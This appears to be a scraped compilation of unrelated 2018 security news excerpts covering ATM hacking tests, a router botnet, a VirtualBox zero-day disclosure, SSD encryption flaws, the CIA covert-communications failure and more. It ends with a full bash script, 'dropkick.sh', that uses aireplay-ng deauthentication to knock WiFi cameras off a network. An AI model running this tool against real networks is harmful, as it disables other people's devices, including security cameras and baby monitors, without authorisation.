An extensive testing session carried out by bank security experts at Positive Technologies has revealed that most ATMs can be hacked in under 20 minutes, and even less, in certain types of attacks.
Experts tested ATMs from NCR, Diebold Nixdorf, and GRGBanking, and detailed their findings in a 22-page report published this week.
The attacks they tried are the typical types of exploits and tricks used by cyber-criminals seeking to obtain money from the ATM safe or to copy the details of users’ bank cards (also known as skimming).
Image: Positive Technologies
Experts said that 85 percent of the ATMs they tested allowed an attacker access to the network. The research team did this by either unplugging and tapping into Ethernet cables, or by spoofing wireless connections or devices to which the ATM usually connected to.
Researchers said that 27 percent of the tested ATMs were vulnerable to having their processing center communications spoofed, while 58 percent of tested ATMs had vulnerabilities in their network components or services that could be exploited to control the ATM remotely.
Furthermore, 23 percent of the tested ATMs could be attacked and exploited by targeting other network devices connected to the ATM, such as, for example, GSM modems or routers.
“Consequences include disabling security mechanisms and controlling output of banknotes from the dispenser,” researchers said in their report.
PT experts said that the typical “network attack” took under 15 minutes to execute, based on their tests.
Image: Positive Technologies
But in case ATM hackers were looking for a faster way in, researchers also found that Black Box attacks were the fastest, usually taking under 10 minutes to pull off.
A Black Box attack is when a hacker either opens the ATM case or drills a hole in it to reach the cable connecting the ATM’s computer to the ATM’s cash box (or safe). Attackers then connect a custom-made tool, called a Black Box, that tricks the ATM into dispensing cash on demand.
PT says that 69 percent of the ATMs they tested were vulnerable to such attacks and that on 19 percent of ATMs, there were no protections against Black Box attacks at all.
Image: Positive Technologies
Another way through which researchers attacked the tested ATMs was by trying to exit kiosk mode –the OS mode in which the ATM interface runs in.
Researchers found that by plugging a device into one of the ATM’s USB or PS/2 interfaces, they could pluck the ATM from kiosk mode and run commands on the underlying OS to cash out money from the ATM safe.
The PT team says this attack usually takes under 15 minutes, and that 76 percent of the tested ATMs were vulnerable.
Image: Positive Technologies
Another attack, and the one that took the longest to pull off but yielded the highest results, was one during which researchers bypassed the ATM’s internal hard drive and booted from an external one.
PT experts said that 92 percent of the ATMs they tested were vulnerable. This happened because the ATMs either didn’t have a BIOS password, used one that was easy to guess, or didn’t use disk data encryption.
Researchers said that during their tests, which normally didn’t take more than 20 minutes, they changed the boot order in the BIOS, booted the ATM from their own hard drive, and made changes to the ATM’s normal OS on the legitimate hard drive, changes which could permit cash outs or ATM skimming operations.
Image: Positive Technologies
In another test, PT researchers also found that attackers with physical access to the ATM could restart the device and force it to boot into a safe/debug mode.
This, in turn, would allow the attackers access to various debug utilities or COM ports through which they could infect the ATM with malware.
The attack took under 15 minutes to execute, and researchers found that 42 percent of the ATMs they tested were vulnerable.
Image: Positive Technologies
Last but not least, the most depressing results came in regards to tests of how ATMs transmitted card data internally, or to the bank.
PT researchers said they were able to intercept card data sent between the tested ATMs and a bank processing center in 58 percent of the cases, but they were 100 percent successful in intercepting card data while it was processed internally inside the ATM, such as when it was transmitted from the card reader to the ATM’s OS.
This attack also took under 15 minutes to pull off. Taking into account that most real-world ATM attacks happen during the night and target ATMs in isolated locations, 20 minutes is more than enough for most criminal operations.
“More often than not, security mechanisms are a mere nuisance for attackers: our testers found ways to bypass protection in almost every case,” the PT team said. “Since banks tend to use the same configuration on large numbers of ATMs, a successful attack on a single ATM can be easily replicated at greater scale.”
A recently discovered botnet has taken control of an eye-popping 100,000 home and small-office routers made from a range of manufacturers, mainly by exploiting a critical vulnerability that has remained unaddressed on infected devices more than five years after it came to light.
Researchers from Netlab 360, who reported the mass infection late last week, have dubbed the botnet BCMUPnP_Hunter. The name is a reference to a buggy implementation of the Universal Plug and Play protocol built into Broadcom chipsets used in vulnerable devices. An advisory released in January 2013 warned that the critical flaw affected routers from a raft of manufacturers, including Broadcom, Asus, Cisco, TP-Link, Zyxel, D-Link, Netgear, and US Robotics. The finding from Netlab 360 suggests that many vulnerable devices were allowed to run without ever being patched or locked down through other means.
Last week’s report documents 116 different types of devices that make up the botnet from a diverse group of manufacturers. Once under the attackers’ control, the routers connect to a variety of well-known email services. This is a strong indication that the infected devices are being used to send spam or other types of malicious mail.
Universal Plug and Play
UPnP is designed to make it easy for computers, printers, phones, and other devices to connect to local networks using code that lets them automatically discover each other. The protocol often eliminates the hassle of figuring out how to configure devices the first time they’re connected. But UPnP, as researchers have warned for years, often opens up serious holes inside the networks that use it. In some cases, UPnP bugs cause devices to respond to discovery requests sent from outside the network. Hackers can exploit the weakness in a way that allows them to take control of the devices. UPnP weaknesses can also allow hackers to bypass firewall protections.
Microsoft’s activation servers appear to be on the blink this morning – some Windows 10 users woke up to find their Pro systems have, er, gone Home.
Twitter user Matt Wadley was one of the first out of the gate, complaining that following an update to the freshly released Insider build of next year’s Windows, his machine suddenly thought it had a Windows 10 Home licence.
While Insider build 18277, which appeared yesterday, contains lots of goodies, including improvements to Focus Assist to stop notifications bothering customers using apps in fullscreen mode, improvements to High-DPI, and an intriguing setting to allow users to manage camera and mic settings in Application Guard for Edge, it did not mention anything about borking the machine’s licence.
To the relief of the bruised Insider team, but no one else, it soon became apparent that the issue is not just isolated to those brave souls trying out preview code, but over many versions of Windows 10.
The vast majority of issues reported so far appear to be from users who upgraded from a previous version.
According to those able to get hold of Microsoft’s call centres, the advice is to wait a while and the problem should fix itself, indicating something has gone awry on the licensing servers, and engineers are currently scrambling to fix it. Your machine should be usable in the meantime.
The Register contacted Microsoft to learn more, and we will update if there is a response.
Luckily, the problem does not look to be too widespread, which will be small comfort to affected users who, er, might want to join a domain, set up Hyper-V or all of the other goodies found in Windows 10 Pro. ®
Updated to add at 1220 UTC
While there remains no official statement from Microsoft on the problem, users have reported that the hardworking support operatives of the Windows giant have warned that there is indeed a “temporary issue” with its activation servers related to the Pro edition. Affected customers are advised to sit tight and wait for a fix. An estimate for when that might be? Anywhere from one to two days. Oh dear.
Updated to add at 2150 UTC
Folks are reporting the licensing issues are fixed. Click on Troubleshoot in the activation error window, and it should resolve itself. You may have to reboot and run Windows Update to nudge it along, we’re told.
“We’re working to restore product activations for the limited number of affected Windows 10 Pro customers,” Microsoft senior director Jeff Jones told us earlier this evening.
Final update at 0100 UTC
If you can’t get rid of the activation error, don’t worry, it should clear by itself, a Microsoft spokesman said – now that Redmond’s techies have sufficiently bashed their machines with spanners:
A limited number of customers experienced an activation issue that our engineers have now addressed. Affected customers will see resolution over the next 24 hours as the solution is applied automatically. In the meantime, they can continue to use Windows 10 Pro as usual.
Apple’s new-generation Macs come with a new so-called Apple T2 security chip that’s supposed to provide a secure enclave co-processor responsible for powering a series of security features, including Touch ID. At the same time, this security chip enables the secure boot feature on Apple’s computers, and by the looks of things, it’s also responsible for a series of new restrictions that Linux users aren’t going to like.
The issue seems to be that Apple has included security certificates for its own and Microsoft’s operating systems (to allow running Windows via Bootcamp), but not for the certificate that was provided for systems such as Linux. Disabling Secure Boot can overcome this, but also disables access to the machine’s internal storage, making installation of Linux impossible.
I like VirtualBox and it has nothing to do with why I publish a 0day vulnerability. The reason is my disagreement with contemporary state of infosec, especially of security research and bug bounty:
Wait half a year until a vulnerability is patched is considered fine.
In the bug bounty field these are considered fine:
Wait more than month until a submitted vulnerability is verified and a decision to buy or not to buy is made.
Change the decision on the fly. Today you figured out the bug bounty program will buy bugs in a software, week later you come with bugs and exploits and receive “not interested”.
Have not a precise list of software a bug bounty is interested to buy bugs in. Handy for bug bounties, awkward for researchers.
Have not precise lower and upper bounds of vulnerability prices. There are many things influencing a price but researchers need to know what is worth to work on and what is not.
Delusion of grandeur and marketing bullshit: naming vulnerabilities and creating websites for them; making a thousand conferences in a year; exaggerating importance of own job as a security researcher; considering yourself “a world saviour”. Come down, Your Highness.
I’m exhausted of the first two, therefore my move is full disclosure. Infosec, please move forward.
How to protect yourself
Until the patched VirtualBox build is out you can change the network card of your virtual machines to PCnet (either of two) or to Paravirtualized Network. If you can’t, change the mode from NAT to another one. The former way is more secure.
Introduction
A default VirtualBox virtual network device is Intel PRO/1000 MT Desktop (82540EM) and the default network mode is NAT. We will refer to it E1000.
The E1000 has a vulnerability allowing an attacker with root/administrator privileges in a guest to escape to a host ring3. Then the attacker can use existing techniques to escalate privileges to ring 0 via /dev/vboxdrv.
Exploit
The exploit is Linux kernel module (LKM) to load in a guest OS. The Windows case would require a driver differing from the LKM just by an initialization wrapper and kernel API calls.
Elevated privileges are required to load a driver in both OSs. It’s common and isn’t considered an insurmountable obstacle. Look at Pwn2Own contest where researcher use exploit chains: a browser opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0 from where there are anything you need to attack a hypervisor from the guest OS. The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it’s mostly not audited yet.
The exploit is 100% reliable. It means it either works always or never because of mismatched binaries or other, more subtle reasons I didn’t account. It works at least on Ubuntu 16.04 and 18.04 x86_64 guests with default configuration.
As we have passed the three-year anniversary of the US EMV migration deadline, it is evident that the majority of financial institutions were successful in providing their customers with new EMV enabled cards. However, contrary to the prevailing logic, migration to the EMV did not eradicate the card-present fraud. Of more than 60 million payment cards stolen in the past 12 months, chip-enabled cards represented a staggering 93%.These results directly reflect the lack of US merchant compliance with the EMV implementation.
Key Findings
60 million US payment cards have been compromised in the past 12 months.
45.8 million or 75% are Card-Present (CP) records and were stolen at the point-of-sale devices, while only 25% were compromised in online breaches.
90% of the CP compromised US payment cards were EMV enabled.
The US leads the rest of the world in the total amount of compromised EMV payment cards by a massive 37.3 million records.
Financially motivated threat groups are still exploiting the lack of merchant EMV compliance.
An imminent shift from card-present to card-not-present fraud is already evident with a 14% increase in payment cards stolen through e-commerce breaches in the past 12 months.
Basically they are saying this should go down as merchants employ the technology correctly at the point of sale. Big companies are starting to do this, but small ones are not, so they will become the prevailing targets in the next few years.
Dutch police claim to have snooped on more than a quarter of a million encrypted messages sent between alleged miscreants using BlackBox IronPhones.
The extraordinary claim was made in a press conference on Tuesday, in which officers working on a money-laundering investigation reckoned they had been able to see crims chatting “live for some time.”
The suspects had been using the IronChat app on their IronPhones, which uses a custom implementation of the end-to-end off-the-record (OTR) encryption system to scramble messages.
[…]
While the officers did not detail how they got hold of and cracked the encrypted IronChat messages, they had seized BlackBox Security’s server. It sounds as though the encrypted conversations were routed through that system. Therefore, once collared, that box could have been set up to decrypt and re-encrypt messages on the fly, or otherwise intercept the connections, allowing the cops to spy on the chats.
Intelligence from these conversations was then used to snare folks suspected of laundering money and other crimes.
Specifically, the clog-plod seized the website and server of the Edward Snowden-endorsed company BlackBox Security after arresting two men apparently behind the business: a 46-year-old from Lingewaard, and a 52-year-old from Boxtel. Another three men were nabbed in Almelo and Enschede, and police expect to make “hundreds” more arrests in the course of their investigation.
Most modern browsers—such as Chrome, Firefox, and Edge, and even browsers such as FuzzyFox and DeterFox (different, security-focused versions of Firefox)—have vulnerabilities that allow hosts of malicious websites to extract hundreds to thousands of URLs in a user’s web history, per new research from the University of California San Diego.
What’s worse, the vulnerabilities are built into the way they structure links, meaning that major structural changes will have to take place in these browsers in order to protect user privacy. The only browser that was immune to the attacks was Tor Browser, as the browser does not keep track of a user’s internet history.
[…]
As outlined in the UC San Diego report, this sniffing could happen in a couple of ways: they could force the browser to reload multiple complex images or image transformations that differ based on whether you’ve visited a link or not, which would create drastic differences in the loading time for each. With this strategy, actors can test 60 sensitive URLs per second.
In Google Chrome, the actor could also exploit what’s called a bytecode cache, which speeds up the loading time for revisiting a link that you’ve already visited. By embedding a special script in a web page, the actor can test how long it takes for a web page to load and infer whether you’ve visited it or not. Actors can probe 3,000 URLs per second with this method. But when the researchers reported the vulnerability to Google, the company marked the issue as “security-sensitive” but “low-priority.”
Fundamental flaws in the encryption system used by popular solid-state drives (SSDs) can be exploited by miscreants to easily decrypt data, once they’ve got their hands on the equipment.
A paper [PDF] drawn up by researchers Carlo Meijer and Bernard van Gastel at Radboud University in the Netherlands, and made public today, describes these critical weaknesses. The bottom line is: the drives require a password to encrypt and decrypt their contents, however this password can be bypassed, allowing crooks and snoops to access ciphered data.
Basically, the cryptographic keys used to encrypt and decrypt the data are not derived from the owner’s password, meaning, you can seize a drive and, via a debug port, reprogram it to accept any password. At that point, the SSD will use its stored keys to cipher and decipher its contents. Yes, it’s that dumb.
The egghead duo tested three Crucial and four Samsung models of SSDs, and found them more or less vulnerable to the aforementioned attack, although it does depend on their final configuration. Check the table below for the specific findings and settings to determine if your rig is vulnerable. All of the drives tried, and failed, to securely implement the TCG Opal standard of encryption.
From around 2009 to 2013, the U.S. intelligence community experienced crippling intelligence failures related to the secret internet-based communications system, a key means for remote messaging between CIA officers and their sources on the ground worldwide. The previously unreported global problem originated in Iran and spiderwebbed to other countries, and was left unrepaired — despite warnings about what was happening — until more than two dozen sources died in China in 2011 and 2012 as a result, according to 11 former intelligence and national security officials.
[…]
One of the largest intelligence failures of the past decade started in Iran in 2009, when the Obama administration announced the discovery of a secret Iranian underground enrichment facility — part of Iran’s headlong drive for nuclear weapons. Angered about the breach, the Iranians went on a mole hunt, looking for foreign spies, said one former senior intelligence official.
The mole hunt wasn’t hard, in large part, because the communications system the CIA was using to communicate with agents was flawed. Former U.S. officials said the internet-based platform, which was first used in war zones in the Middle East, was not built to withstand the sophisticated counterintelligence efforts of a state actor like China or Iran. “It was never meant to be used long term for people to talk to sources,” said one former official. “The issue was that it was working well for too long, with too many people. But it was an elementary system.”
“Everyone was using it far beyond its intention,” said another former official.
[…]
Though the Iranians didn’t say precisely how they infiltrated the network, two former U.S. intelligence officials said that the Iranians cultivated a double agent who led them to the secret CIA communications system. This online system allowed CIA officers and their sources to communicate remotely in difficult operational environments like China and Iran, where in-person meetings are often dangerous.
[…]
In fact, the Iranians used Google to identify the website the CIA was using to communicate with agents. Because Google is continuously scraping the internet for information about all the world’s websites, it can function as a tremendous investigative tool — even for counter-espionage purposes. And Google’s search functions allow users to employ advanced operators — like “AND,” “OR,” and other, much more sophisticated ones — that weed out and isolate websites and online data with extreme specificity.
According to the former intelligence official, once the Iranian double agent showed Iranian intelligence the website used to communicate with his or her CIA handlers, they began to scour the internet for websites with similar digital signifiers or components — eventually hitting on the right string of advanced search terms to locate other secret CIA websites. From there, Iranian intelligence tracked who was visiting these sites, and from where, and began to unravel the wider CIA network.
[…]
But the events in Iran were not self-contained; they coincided roughly with a similar debacle in China in 2011 and 2012, where authorities rounded up and executed around 30 agents working for the U.S. (the New York Times first reported the extirpation of the CIA’s China sources in May 2017). Some U.S. intelligence officials also believe that former Beijing-based CIA officer Jerry Lee, who was charged with spying on behalf of the Chinese government in May 2018, was partially responsible for the destruction of the CIA’s China-based source network. But Lee’s betrayal does not explain the extent of the damage, or the rapidity with which Chinese intelligence was able to identify and destroy the network, said former officials.
[…]
As Iran was making fast inroads into the CIA’s covert communications system, back in Washington an internal complaint by a government contractor warning officials about precisely what was happening was winding its way through a Kafkaesque appeals system.
In 2008 — well before the Iranians had arrested any agents — a defense contractor named John Reidy, whose job it was to identify, contact and manage human sources for the CIA in Iran, had already sounded an alarm about a “massive intelligence failure” having to do with “communications” with sources. According to Reidy’s publicly available but heavily redacted whistleblower disclosure, by 2010 he said he was told that the “nightmare scenario” he had warned about regarding the secret communications platform had, in fact, occurred.
Reidy refused to discuss his case with Yahoo News. But two former government officials directly familiar with his disclosure and the investigation into the compromises in China and Iran tell Yahoo News that Reidy had identified the weaknesses — and early compromise — that eventually befell the entire covert communications platform.
Reidy’s case was complicated. After he blew the whistle, he was moved off of his subcontract with SAIC, a Virginia company that works on government information technology products and support. According to the public disclosure, he contacted the CIA inspector general and congressional investigators about his employment status but was met with resistance, partially because whistleblower protections are complicated for federal contractors, and he remained employed.
Meanwhile, throughout 2010 and 2011, the compromise continued to spread, and Reidy provided details to investigators. But by November 2011, Reidy was fired because of what his superiors said were conflicts of interest, as Reidy maintained his own side business. Reidy believed the real reason was retaliation.
[…]
“Can you imagine how different this whole story would’ve turned out if the CIA [inspector general] had acted on Reidy’s warnings instead of going after him?” said Kel McClanahan, Reidy’s attorney. “Can you imagine how different this whole story would’ve turned out if the congressional oversight committees had done oversight instead of taking CIA’s word that he was just a troublemaker?”
Irvin McCullough, a national security analyst with the Government Accountability Project, a nonprofit that works with whistleblowers, put the issue in even starker terms. “This is one of the most catastrophic intelligence failures since Sept. 11,” he said. “And the CIA punished the person who brought the problem to light.”
Microsoft’s Office 365 has been giving some users cold sweats. No matter how hard they try to log in, they simply can’t access the service and haven’t been able to for hours – others say it has wobbled for days.
Sporadic reports of unrest began to emerge on Down Detector on Friday (26 October) in the UK and across the pond, stopped over the weekend and started again prior to 0800 GMT today. Office 365’s web woes have still not been resolved at the time of writing.
The first complaint was spotted on Twitter just after 0700 GMT.
Microsoft, at least initially, seemed to know nothing of the activation worries to which admin Tom Ruben referred, but he was backed up by others.
Admins raised support tickets with Microsoft but complained they’d only received acknowledgement of the outage early on in the screw-up and had precious else since.
Microsoft has said it is “investigating issues related to repeated credential prompts and users being unable to log in using the Outlook client under EX152471”. It asked admins to “please check the admin centre for more details”.
Like fingerprints, no 3D printer is exactly the same. That’s the takeaway from a new study that describes what’s believed to be the first accurate method for tracing a 3D-printed object to the machine it came from. The advancement could help law enforcement and intelligence agencies track the origin of 3D-printed guns, counterfeit products and other goods.
[…]
“3D printers are built to be the same. But there are slight variations in their hardware created during the manufacturing process that lead to unique, inevitable and unchangeable patterns in every object they print,” Xu says.
To test PrinTracker, the research team created five door keys each from 14 common 3D printers — 10 fused deposition modeling (FDM) printers and four stereolithography (SLA) printers.
With a common scanner, the researchers created digital images of each key. From there, they enhanced and filtered each image, identifying elements of the in-fill pattern. They then developed an algorithm to align and calculate the variations of each key to verify the authenticity of the fingerprint.
Having created a fingerprint database of the 14 3D printers, the researchers were able to match the key to its printer 99.8 percent of the time. They ran a separate series of tests 10 months later to determine if additional use of the printers would affect PrinTracker’s ability to match objects to their machine of origin. The results were the same.
The team also ran experiments involving keys damaged in various ways to obscure their identity. PrinTracker was 92 percent accurate in these tests.
For at least three years, hackers have abused a zero-day in one of the most popular jQuery plugins to plant web shells and take over vulnerable web servers, ZDNet has learned.
The vulnerability impacts the jQuery File Upload plugin authored by prodigious German developer Sebastian Tschan, most commonly known as Blueimp.
The plugin is the second most starred jQuery project on GitHub, after the jQuery framework itself. It is immensely popular, has been forked over 7,800 times, and has been integrated into hundreds, if not thousands, of other projects, such as CMSs, CRMs, Intranet solutions, WordPress plugins, Drupal add-ons, Joomla components, and so on.
A vulnerability in this plugin would be devastating, as it could open gaping security holes in a lot of platforms installed in a lot of sensitive places.
This worse case scenario is exactly what happened. Earlier this year, Larry Cashdollar, a security researcher for Akamai’s SIRT (Security Intelligence Response Team), has discovered a vulnerability in the plugin’s source code that handles file uploads to PHP servers.
Cashdollar says that attackers can abuse this vulnerability to upload malicious files on servers, such as backdoors and web shells.
The UK’s Information Commissioner has formally fined Facebook £500,000 – the maximum available – over the Cambridge Analytica scandal.
In a monetary penalty notice issued this morning, the Information Commissioner’s Office (ICO) stated that the social media network had broken two of the UK’s legally binding data protection principles by allowing Cambridge academic Aleksandr Kogan to harvest 87 million Facebook users’ personal data through an app disguised as an innocent online quiz.
“Facebook… failed to keep the personal information secure because it failed to make suitable checks on apps and developers using its platform. These failings meant one developer, Dr Aleksandr Kogan and his company GSR, harvested the Facebook data of up to 87 million people worldwide, without their knowledge,” said the ICO in its statement on the fine.
“The Facebook Companies thereby acted in breach of section 4(4) of the [Data Protection Act], which at all material time required data controllers to comply with the data protection principles in relation to all personal data in respect of which they were the data controller,” continued the ICO in its penalty notice (PDF, 27 pages).
The £500k fine is the maximum penalty available to the ICO under 1998’s Data Protection Act. The regulator noted: “But for the statutory limitation on the amount of the monetary penalty, it would have been reasonable and proportionate to impose a higher penalty.” Nonetheless, with Facebook making a net income of $5.1bn in its latest fiscal quarter, the penalty amounts to just over quarter of an hour’s profits*.
A security bug in Systemd can be exploited over the network to, at best, potentially crash a vulnerable Linux machine, or, at worst, execute malicious code on the box.
The flaw therefore puts Systemd-powered Linux computers – specifically those using systemd-networkd – at risk of remote hijacking: maliciously crafted DHCPv6 packets can try to exploit the programming cockup and arbitrarily change parts of memory in vulnerable systems, leading to potential code execution. This code could install malware, spyware, and other nasties, if successful.
The vulnerability – which was made public this week – sits within the written-from-scratch DHCPv6 client of the open-source Systemd management suite, which is built into various flavors of Linux.
This client is activated automatically if IPv6 support is enabled, and relevant packets arrive for processing. Thus, a rogue DHCPv6 server on a network, or in an ISP, could emit specially crafted router advertisement messages that wake up these clients, exploit the bug, and possibly hijack or crash vulnerable Systemd-powered Linux machines.
systemd-networkd is vulnerable to an out-of-bounds heap write in the DHCPv6 client when handling options sent by network adjacent DHCP servers. A attacker could exploit this via malicious DHCP server to corrupt heap memory on client machines, resulting in a denial of service or potential code execution.
A startup that claims to sell surveillance and hacking technologies to governments around the world left nearly all its data—including information taken from infected targets and victims—exposed online, according to a security firm who found the data.
Wolf Intelligence, a Germany-based spyware company that made headlines for sending a bodyguard to Mauritania and prompting an international incident after the local government detained the bodyguard as collateral for a deal went wrong, left a trove of its own data exposed online. The leak exposed 20 gigabytes of data, including recordings of meetings with customers, a scan of a passport belonging to the company’s founder, scans of the founder’s credit cards, and surveillance targets’ data, according to researchers.
Security researchers from CSIS Security discovered the data on an unprotected command and control server and a public Google Drive folder. The researchers showed screenshots of the leaked data during a talk at the Virus Bulletin conference in Montreal, which Motherboard attended.
“This is a very stupid story in the sense that you would think that a company actually selling surveillance tools like this would know more about operational security,” CSIS co-founder Peter Kruse told Motherboard in an interview. “They exposed themselves—literally everything was available publicly on the internet.”
When President Trump calls old friends on one of his iPhones to gossip, gripe or solicit their latest take on how he is doing, American intelligence reports indicate that Chinese spies are often listening — and putting to use invaluable insights into how to best work the president and affect administration policy, current and former American officials said.
Mr. Trump’s aides have repeatedly warned him that his cellphone calls are not secure, and they have told him that Russian spies are routinely eavesdropping on the calls, as well. But aides say the voluble president, who has been pressured into using his secure White House landline more often these days, has still refused to give up his iPhones. White House officials say they can only hope he refrains from discussing classified information when he is on them.
Mr. Trump’s use of his iPhones was detailed by several current and former officials, who spoke on the condition of anonymity so they could discuss classified intelligence and sensitive security arrangements. The officials said they were doing so not to undermine Mr. Trump, but out of frustration with what they considered the president’s casual approach to electronic security.
American spy agencies, the officials said, had learned that China and Russia were eavesdropping on the president’s cellphone calls from human sources inside foreign governments and intercepting communications between foreign officials.
Yahoo has agreed to pay $50 million in damages and provide two years of free credit-monitoring services to 200 million people whose email addresses and other personal information were stolen as part of the biggest security breach in history.
The restitution hinges on federal court approval of a settlement filed late Monday in a 2-year-old lawsuit seeking to hold Yahoo accountable for digital burglaries that occurred in 2013 and 2014, but weren’t disclosed until 2016.
It adds to the financial fallout from a security lapse that provided a mortifying end to Yahoo’s existence as an independent company and former CEO Marissa Mayer’s six-year reign.
Yahoo revealed the problem after it had already negotiated a $4.83 billion deal to sell its digital services to Verizon Communications. It then had to discount that price by $350 million to reflect its tarnished brand and the specter of other potential costs stemming from the breach.
Verizon will now pay for one half of the settlement cost, with the other half paid by Altaba Inc., a company that was set up to hold Yahoo’s investments in Asian companies and other assets after the sale. Altaba already paid a $35 million fine imposed by the Securities and Exchange Commission for Yahoo’s delay in disclosing the breach to investors.
About 3 billion Yahoo accounts were hit by hackers that included some linked to Russia by the FBI . The settlement reached in a San Jose, California, court covers about 1 billion of those accounts held by an estimated 200 million people in the U.S. and Israel from 2012 through 2016.
Claims for a portion of the $50 million fund can be submitted by any eligible Yahoo accountholder who suffered losses resulting from the security breach. The costs can include such things as identity theft, delayed tax refunds or other problems linked to having had personal information pilfered during the Yahoo break-ins.
The fund will compensate Yahoo accountholders at a rate of $25 per hour for time spent dealing with issues triggered by the security breach, according to the preliminary settlement. Those with documented losses can ask for up to 15 hours of lost time, or $375. Those who can’t document losses can file claims seeking up to five hours, or $125, for their time spent dealing with the breach.
Yahoo accountholders who paid $20 to $50 annually for a premium email account will be eligible for a 25 percent refund.
The free credit monitoring service from AllClear could end up being the most valuable part of the settlement for most accountholders. The lawyers representing the accountholders pegged the retail value of AllClear’s credit-monitoring service at $14.95 per month, or about $359 for two years — but it’s unlikely Yahoo will pay that rate. The settlement didn’t disclose how much Yahoo had agreed to pay AllClear for covering affected accountholders.
Printer maker Epson is under fire this month from activist groups after a software update prevented customers from using cheaper, third party ink cartridges. It’s just the latest salvo in a decades-long effort by printer manufacturers to block consumer choice, often by disguising printer downgrades as essential product improvements.
For several decades now printer manufacturers have lured consumers into an arguably-terrible deal: shell out a modest sum for a mediocre printer, then pay an arm and a leg for replacement printer cartridges that cost relatively-little to actually produce.
Unsurprisingly, this resulted in a booming market for discount cartridges and refillable alternatives. Just as unsurprisingly, major printer vendors quickly set about trying to kill this burgeoning market via all manner of lawsuits and dubious behavior.
Initially, companies like Lexmark filed all manner of unsuccessful copyright and patent lawsuits against third-party cartridge makers. When that didn’t work, hardware makers began cooking draconian restrictions into printers, ranging from unnecessary cartridge expiration dates to obnoxious DRM and firmware updates blocking the use of “unofficial” cartridges.
As consumer disgust at this behavior has grown, printer makers have been forced to get more creative in their efforts to block consumer choice.
HP, for example, was widely lambasted back in 2016 when it deployed a “security update” that did little more than block the use of cheaper third-party ink cartridges. HP owners that dutifully installed the update suddenly found their printers wouldn’t work if they’d installed third-party cartridges, forcing them back into the arms of pricier, official HP cartridges.
Massive public backlash forced HP to issue a flimsy mea culpa and reverse course, but the industry doesn’t appear to have learned its lesson quite yet.
The Electronic Frontier Foundation now says that Epson has been engaged in the same behavior. The group says it recently learned that in late 2016 or early 2017, Epson issued a “poison pill” software update that effectively downgraded user printers to block third party cartridges, but disguised the software update as a meaningful improvement.
The EFF has subsequently sent a letter to Texas Attorney General Ken Paxton, arguing that Epson’s lack of transparency can easily be seen as “misleading and deceptive” under Texas consumer protection laws.
“When restricted to Epson’s own cartridges, customers must pay Epson’s higher prices, while losing the added convenience of third party alternatives, such as refillable cartridges and continuous ink supply systems,” the complaint notes. “This artificial restriction of third party ink options also suppresses a competitive ink market and has reportedly caused some manufacturers of refillable cartridges and continuous ink supply systems to exit the market.”
Epson did not immediately return a request for comment.
Activist, author, and EFF member Cory Doctorow tells Motherboard that Epson customers in other states that were burned by the update should contact the organization. That feedback will then be used as the backbone for additional complaints to other state AGs.
“Inkjet printers are the trailblazers of terrible technology business-models, patient zero in an epidemic of insisting that we all arrange our affairs to benefit corporate shareholders, at our own expense,” Doctorow told me via email.
Doctorow notes that not only is this kind of behavior sleazy, it undermines security by eroding consumer faith in the software update process. Especially given that some printers can be easily compromised and used as an attack vector into the rest of the home network.
“By abusing the updating mechanism, Epson is poisoning the security well for all of us: when Epson teaches people not to update their devices, they put us all at risk from botnets,ransomware epidemics, denial of service, cyber-voyeurism and the million horrors of contemporary internet security,” Doctorow said.
“Infosec may be a dumpster-fire, but that doesn’t mean Epson should pour gasoline on it,” he added.
There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.
Thanks to Adam Harvey for giving me the push, not to mention for naming it.
For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.
#!/bin/bash## DROPKICK.SH ## Detect and Disconnect the DropCam and Withings devices some people are using to# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:## http://julianoliver.com/output/log_2014-05-30_20-52 ## This script was named by Adam Harvey (http://ahprojects.com), who also# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio# notification. Comment it out if you don't need it.## See also http://plugunplug.net, for a plug-and-play device that does this# based on OpenWrt. Code here:## https://github.com/JulianOliver/CyborgUnplug# # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:## sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>shopt -s nocasematch # Set shell to ignore caseshopt -s extglob # For non-interactive shell.readonly NIC=$1# Your wireless NICreadonly BSSID=$2# Network BSSID (AirBnB WiFi network)readonly MAC=$(/sbin/ifconfig | grep $NIC| head -n 1| awk '{ print $5 }')# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not# present.readonly GGMAC='@(30:8C:FB*|00:24:E4*)'# Match against DropCam and Withings readonly POLL=30# Check every 30 secondsreadonly LOG=/var/log/dropkick.log
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC# Start a monitor devicewhiletrue;dofor TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')doif[["$TARGET"=="$GGMAC"]]then# Audio alert
beep -f 1000 -l 500 -n 200 -r 2
echo"WiFi camera discovered: "$TARGET >> $LOG
aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
echo"De-authed: "$TARGET" from network: "$BSSID >> $LOGecho' __ __ _ __ __ ___/ /______ ___ / /__ (_)___/ /_____ ___/ / / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ /_/ 'elseecho$TARGET": is not a DropCam or Withings device. Leaving alone.."fidoneecho"None found this round."
sleep $POLLdone
airmon-ng stop mon0
Disclaimer
For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers – while illegal – are cheap. If you care, use cable.
